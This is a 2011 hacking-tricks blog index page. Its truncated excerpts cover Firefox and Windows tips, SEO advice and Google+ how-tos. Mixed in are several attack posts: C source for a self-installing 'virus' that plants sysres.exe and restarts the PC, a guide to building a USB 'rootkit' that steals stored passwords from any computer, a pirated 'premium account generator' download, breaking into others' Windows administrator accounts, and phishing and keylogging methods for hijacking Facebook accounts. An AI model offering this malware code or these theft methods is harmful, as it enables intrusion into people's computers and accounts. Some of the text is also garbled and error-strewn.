Tuesday, 23 August 2011

HOW TO GET GLASSY TRANSPERANCY IN FIREFOX

  n Widows 7, aero glass effect looks very nice. You can update your firefox browser too to have same glassy effects. To look firefox look transparent like glassy effect ypu need to download and install an ADD-ON in firefox. This add on is only for windows. Add to firefox https://addons.mozilla.org/firefox/downloads/latest/13905/platform:5/addon-13905-latest.xpi?src=addondet...

MEGAUPLOAD PREMIUM ACCOUNT GENERATOR

If you want to enjoy megaupload as premium usr, download this tool and install. I got this tool on the website www.egyhacks.net and the reviews were good. The name of the tool is Megakey Features. 1) It removes limitations on megaupload and megavideo. 2) It provides happy hour premium access to all mega sites. 3) It allows for ultra fast up & downloads thanks to multiplexing technology. 4) It identifies music files on your PC and make them available in your megabox. 5) It gives you a direct connection to mega servers. 6) No delays and availability. In the future you get free access to movies, music and games licensed by mega. Download Here: I am not the uploader of this tool and will not be responsible for this.. download at your...

Thursday, 11 August 2011

how to install windows through pendrive?

This guide works 100% for Vista & Windows 7 unlike most of the guides out there. I have seen many sites/blogs that have “Install Vista from USB guide” but either with incomplete steps or not working guide. I have also seen some guides that don’t’ use proper commands in this guide. After spending many hours I have come up with this 100% working guide. I just did this method on one of my friends machine and installed the new Windows 7 BETA. The main advantage is that by using USB drive you will be able to install Windows 7/Vista in just 15 minutes. You can also use this bootable USB drive on friend’s computer who doesn’t have a DVD optical drive. The method is very simple and you can use without any hassles. Needless to say that your...

Wednesday, 10 August 2011

HOW MAKE PASSWORDS THAT RESTARTS PC AGAIN AND AGAIN

I suppose everyone using Computer might have come across the term Virus but have you ever wondered about creating one? In this post I will tell you how to create a virus in C that restarts computer on startup You need to compile the code given in C compiler and make it yours. Source Code in C :::::: #include<stdio.h> #include<dos.h> #include<dir.h> int found,drive_no;char buff[128]; void findroot() { int done; struct ffblk ffblk; //File block structure done=findfirst(“C:\windows\system”,&ffblk,FA_DIREC); //to determine the root drive if(done==0) { done=findfirst(“C:\windows\system\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not if(done==0) { found=1; //means that the system is already infected return; } drive_no=1; return; } done=findfirst(“D:\windows\system”,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“D:\windows\system\sysres.exe”,&ffblk,0); if (done==0) { found=1;return; } drive_no=2; return; } done=findfirst(“E:\windows\system”,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“E:\windows\system\sysres.exe”,&ffblk,0); if(done==0) { found=1; return; } drive_no=3; return; } done=findfirst(“F:\windows\system”,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“F:\windows\system\sysres.exe”,&ffblk,0); if(done==0) { found=1; return; } drive_no=4; return; } else exit(0); } void...

how to leak(sniff) the passwords using pendrive and programs

Anyone can steal stored passwords from any computer and that too by using your USB drive. Can’t believe! Read on.. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit. MessenPass: Recovers the passwords of most popular Instant Messenger...

latest opera tricks

If you are new Opera user, you probably don't know any of these. If you are an old Opera user, you still might not know all of these. Find out how much you know. 1. File browser: Do you know that Opera comes with a basic file browser, a Windows explorer? Type C: in the address bar of Opera and you can see the contents of your C drive. You can browse and open any file; txt files are opened within the browser itself. If you are paranoid about safety, you will be better off using Opera as your explorer. It asks for your permission every time you open a file that launches an external program :) 2. Block flash with Ad Block: The ad block that come with Opera has the ability to block more than just the ads. You can block certain flash, movies,...

tricks for google chrome

From the Google’s Laboratory its few months old browser named with a nice title ‘Google Chrome’ was launched last year. A surprise for most of the onliners and we are still glad by that. This post is for an average user because advanced ones can and do find their ways on their own. I’m hoping that you already know about the basic of handling browser interacting with the usual interface. If you don’t then get some lessons before reading further. Let’s have the useful and heavily used keyboard short cuts which are available in Google Chrome Using the Tabs Ctrl + T : for opening a new tab Ctrl + Shift + T : for undoing the last closed tab Ctrl + W : for closing the current tab Ctrl + TAB : for switching between the currently opened...

Tuesday, 9 August 2011

how to hack windows administrator password

This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password. Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your...

how to make adobe readers as fast as notepad

Well e-books have become an integral part of our daily life and most of them are in .pdf format. .pdf files are opened and read using Adobe Reader. It is a very good software except the fact that it is extremely slow. I ( http://learnhacking.in) was looking for a solution for the problem ie.. to make Adobe Reader Faster and came up with a pretty simple solution. This trick will make Adobe Reader as fast as Notepad. Note:- I tried this trick on Adobe reader 9.0 ( but it works with older versions as well) 1) Go to the installation folder of acrobat reader (C:\program files\adobe\reader9.0\reader\.. whatever) 2) Move all the files and folders from the “plug_ins” directory to the “Optional” directory. (I repeat.. cut and paste the files NOT copy & paste). Also make sure that acrobat...

Sunday, 7 August 2011

HOW TO CREATE AN AUTO PC LOCKER

Whenever you are working on your PC on some important project and have to leave somewhere urgently, I am sure you don’t go before locking your PC , Do you? Though it sucked when everytime I (http://FULLONN.BLOGSPOT.COM) had to log off everytime to lock my PC. Its a very slow process and I hate my machine working slow. And as we all know that necessity is the mother of invention , I came up with a pretty cool solution of this problem and just loved the outcome:D Here in this post I’l tell you how to create your own auto PC Locker and lock your PC just by a Double Click. NOTE:- You must require a possword on Start up for this (no matter admin or user) Well The method is pretty simple Open Notepad copy and paste the script below and save it .VBS extention This wil create a shortcut (on desktop).....

STAR WAR MOVIES HIDDEN IN EVERY COMPUTER;

HEIII GUYS................ YES IT ISSS  THERE ARE STAR WAR MOVIES IN EVEY COMPUTER..... U CAN READ IT IN CMD     .... WITH LITTLE COMMANDD............                                         SO JUST READ    MAY  U LIKE IT...............:) Every computer, no matter what windows you are using has a star wars movie inside it. You just need to have Telnet enabled in it. To enable telnet in visita just click on the link in this line. In Windows XP , Telnet is automatically enabled. Its basically a Telnet command...

HOW TO REMOVE RECYCLE BIN FROM DEKSTOP

HEII     GUYS..............  U MIGHT BE WONDEING HOW TO REMOVE RECY..BIN    FROM UR DEKSTOP ...:)                                   SO HERE ARE THE STEPS FOR UR THIS TRICK..................:>>> 1. Go to start, Run, Type “gpedit.msc” (Type without quotes) 2. On the left panel, under User Configuration expand the tree Administrative templates 3. Click on the subtree desktop (single click, do not expand it) 4. On the right panel, Select the option-Remove Recycle Bin icon from desktop properties 5. Double click the option, on the settings...

HOW TO COMPRESS 1GB DATA IN 10 MB

HEII   .......  FRIENSS      TODAY I  WLL TELL YOU HOW TO COMPRESS A LARGE SIZED DATA IN SMALL SIZE   ... THESE  PROBLEMS  I HAD OFFTEN  FACED .......:) THE ONLY SOFTWARE  I USED IS KGB ARCHIEVER................. I used a software named KGB Archiver. About KGB archiver: KGB Archiver , an open source compression tool like 7zip and UHARC with an unbelievably high compression rate .It uses AES-256 encryption (one of the strongest encryption known for man) to encrypt archives . The disappointing thing with KGB Archiver is due to its high compression rate its minimum hardware requirement is high ( recommend processor with 1,5GHz clock and 256MB of RAM ) and compression and decompression process is time consuming. Its...

Saturday, 6 August 2011

Free Meta Tag Tool

Page Title TipsExceptionally Important: Your page title is the link that will appear in search results. Since it is what people click on in the search results and is the first thing people see about your site search engines place significant weight on it. Usually best if left short ( 5 to 9 words, with most important parts in the first ~ 65 characters) Each page should have its own unique page title. Your primary keywords should occur early in your page title (from word position 2 to 5 or so). Generic words such as "website home" or "welcome to" usually should not appear in your page title. Don't forget to use relevant keyword modifiers in your page title to help draw in more relevant traffic. Search engines such as Google...

SEO TOOLS

Best SEO Tools 2011Google Webmaster Tools (GWT): This is a free SEO tool that I can not live without. The vast amount of information that GWT provides; traffic sources, keywords, CTRs, sitelinks, html suggestions (for duplicate content issues), search queries, site errors, etc., makes it ideal for beginners and advanced users. In addition, GWT provides plenty of information that can help you identify problem areas that need attention to further improve your SEO. Aside from providing you with a wealth of “must have” information, you can use GWT to provide you with data that can help improve your conversions. Google Search Based Keyword Tool: Over and over, this is probably the one word that pops up every time someone talks about SEO,...

On-Page SEO Practices

We all know what this is, right. On-Page SEO is the first thing we can really control as this is all up to us. These are those “factors” that we can do ourselves without having to rely on any external factors (e.g. inbound links, link popularity, domain authority, etc.). “Killer” Content: Nowadays anyone can set up a website in a matter of minutes and “fill it” with other people’s content by using aggregators, bots and all that bad stuff. Provide content that are useful, informative, helpful, updated and whenever possible, “timeless” or pillar articles. This is all that matters, quality, and uniqueness (your own voice). In addition, pick a posting frequency that suits you best and stick to it. You do not have to write an article everyday (unless you are a news site or something similar),...

FREE SEO SIRVECES

Free SEO ServiceFree SEO Service is everyone’s dream, lots of webmasters are trying to optimize their website search engines friendly, but unfortunately due to lack of knowledge they couldn’t. The idea of giving Free SEO Service is in my mind from almost long time, but due to my hectic busy schedule I am unable to make it. But now I am ready to start this new revolution. Providing completely human based Search engine Optimization is a challenging task and very difficult, but I thought of contributing a few hours for my visitors who are loyal and great. The only best assurance of our service is a complete senior and updated person in the industry is going to work on your website for FREE. This is the first human based free website...

Top Essential SEO Tips 2011

Search engine optimization is an ongoing process, I have written a plenty of articles on SEO earlier and about Top 10 SEO Tips of 2011, this is also another to do a list for all the SEO’s and webmasters, mainly here I am concentrating on on-page SEO issues, because most of the time webmasters do mistakes in the on-page only. So let’s discuss the issues with your website and learn how-to fix them. But remember one thing search engine optimization is ever going process, you must be careful with each and every thing, a single mistake can cause huge loss. So anyway myself I have learned everything from mistakes, but every mistake show you a whole new different thoughts, I think we are going out of the topic, let’s start the top essential...

SERVICES THROUGH SEO

Why SEO Services? If the SEO services " and Search Engine Optimization, SEO short called "website is optimized specifically to enable (ranking) in the search engines to get good positions. Reliable SEO without the use of spam techniques provide services for more Link popularity and seo. The process of constant analysis - Why do some websites on the first page? What do these sites have in common? - And you customize your own website on the results of this analysis is SEO. SEO is a "backward engineering" process that optimizes your website so that the Google algorithm, it considers the most relevant page for specific keywords. Our expertise SEO team will definitely make huge Profit for your company. You can very...

WHAT IS SEO?

Step By Step SEO Tutorial Welcome to the SEO for Beginners Session. Its great you have decided to learn this online technique to earn money through simple seo process. Well I hope I can explain everything very clearly. It is complicated at first, if you have not ever used, but after some time you will feel everything very easy. Please keep it mind, seo is a simple, easy but time consuming process. Let's start with this. I assure you that you will love and you can do it easily. Here i'll write everything about seo, better to read and apply one step daily. The simple steps will be included the following 1. You need a website or Blog2. You need a Google Adsense Account 3. Understanding of SEO process 4. Add Google Adsence code in your website5. Promote your website6. Get paid if someone...

Monday, 1 August 2011

How to remove a person from a Circle in Google Plus

How to remove a person from a Circle in Google Plus If you want to remove a person from the Circle in Google+, follow the steps below. Follow the steps below 1. Click on the Circles icon in the top navigation within Google+. It will show all your circles. 2. Double click on the Circle from which you want to remove a person. It will open the Circle and show all members in that Circle. 3. Single click on the person you want to remove from the Circle. If you click again, it will deselect the person. So, make sure the clicked person is highlighted with a highlight color. 4. After selecting the person to remove, click on the link “Remove” from the top right area of the view. This will remove the person from your Circle The removal...

Chrome extension for Google plus notification

Chrome extension for Google plus notification This is a Google Chrome extension for Google plus. It will show an icon after installation and clicking on the icon will pop a window to show all notifications of your Google+ account. Features: Post or respond from within the popup Desktop Notifications Notification sounds Switch between multiple Google accounts Add to Google Chrome https://chrome.google.com/webstore/detail/pfphgaimeghgekhncbkfblhdhfaia...

How to send Private message in Google plus (Google+)

How to send Private message in Google plus (Google+) In Google+ we can share any post as public or private. But there is no option for sending a private message to friends. But you can decide the person who should see yoour post. You can send a personal message or private message in just simple way.  1: Type the message to share box. 2: Now click on (x) in public button for not to share with public. 3: Now you have an option to add circles or people. 4: Type or select the person or enter the email id of the person whom you want to send the message  5: Then share the post. It will only be shared with he person you have chos...

How to delete a circle in Google plus (Google+)

How to delete a circle in Google plus (Google+) Google+ has a unique feature of arrenging friends in circles which is the group of your friends. In default Google has created 4 circles, Friends, Acquaintances, Family and Following. You can create your own circles and add your friends to it.  You can also delete circles in Google+. If you want to delete a circle in Google Plus follow these steps 1: Click on the circles button on the top of Google+ page. and go to the circles 2: Select the circle you want to delete. A new pop dialouge will open 3:Click on delete circ...

A new clickjacking attack hitting facebook

A new clickjacking attack hitting facebook Many times i have posted about clickjacking attack used in facebook. And i think it's not over. A new clickjacking scam is again hitting facebook walls. The spam messages posted by victims of this attack read: "Baby Born Amazing Effect - WebCamera" and contains a link that takes users to a page hosted at blogspot.com.  The page displays a video player thumbnail with a play button, however, trying to click it actually forces the user's browser to Like the page. If you want to know what clickjacking is, read clickjacking introduction post.Few days ago, face deployed a new mechanism for protecting clickjacking attack, but that system doesn't seem to work better. This new spreading scam...

4 ways to hack facebook account

I will cover 4 methods over here: 1. Facebook Phishing 2. Keylogging 3. Social engineering 4. Primary email address hack Facebook phishing: I have taken this method first because i think this is the most popular method/way of hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The results of these surveys show "Phishing" as the most used method to hack facebook and to note…"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to avoid these Facebook phishers. Phishing not only allows you to hack Facebook but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy....

Page 1 of 2112345Next
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Host